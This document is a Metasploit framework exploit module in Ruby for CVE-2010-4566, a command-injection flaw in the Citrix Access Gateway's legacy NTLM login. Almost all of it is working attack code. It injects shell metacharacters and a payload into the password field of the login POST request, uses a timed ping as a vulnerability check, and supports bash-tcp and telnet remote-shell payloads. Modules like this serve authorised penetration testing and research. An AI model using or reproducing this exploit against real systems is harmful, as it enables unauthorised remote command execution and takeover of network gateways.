Citrix Access Gateway Command Execution

`##  
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Citrix Access Gateway Command Execution',  
'Description' => %q{  
The Citrix Access Gateway provides support for multiple authentication types.  
When utilizing the external legacy NTLM authentication module known as  
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command  
line utility to verify a user's identity and password. By embedding shell  
metacharacters in the web authentication form it is possible to execute  
arbitrary commands on the Access Gateway.  
},  
'Author' =>  
[  
'George D. Gal', # Original advisory  
'Erwin Paternotte', # Exploit module  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 11873 $',  
'References' =>  
[  
[ 'CVE', '2010-4566' ],  
[ 'OSVDB', '70099' ],  
[ 'BID', '45402' ],  
[ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 127,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd cmd_bash',  
'RequiredCmd' => 'generic telnet bash-tcp'  
}  
},  
'DefaultOptions' =>  
{  
'WfsDelay' => 30  
},  
'Platform' => [ 'unix' ],  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Dec 21 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(443),  
OptBool.new('SSL', [ true, 'Use SSL', true ]),  
], self.class)  
  
end  
  
def post(command, background)  
username = rand_text_alphanumeric(20)  
  
if background  
sploit = Rex::Text.uri_encode('|' + command + '&')  
else  
sploit = Rex::Text.uri_encode('|' + command)  
end  
  
data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="  
data << username  
data << "&password="  
data << sploit  
  
res = send_request_cgi({  
'uri' => '/',  
'method' => 'POST',  
'data' => data  
}, 25)  
end  
  
def check  
print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")  
  
# Try running/timing 'ping localhost' to determine is system is vulnerable  
start = Time.now  
post("ping -c 10 127.0.0.1", false)  
elapsed = Time.now - start  
if elapsed >= 3  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
cmd = payload.encoded  
  
if not post(cmd, true)  
raise RuntimeError, "Unable to execute the desired command"  
end  
end  
end  
`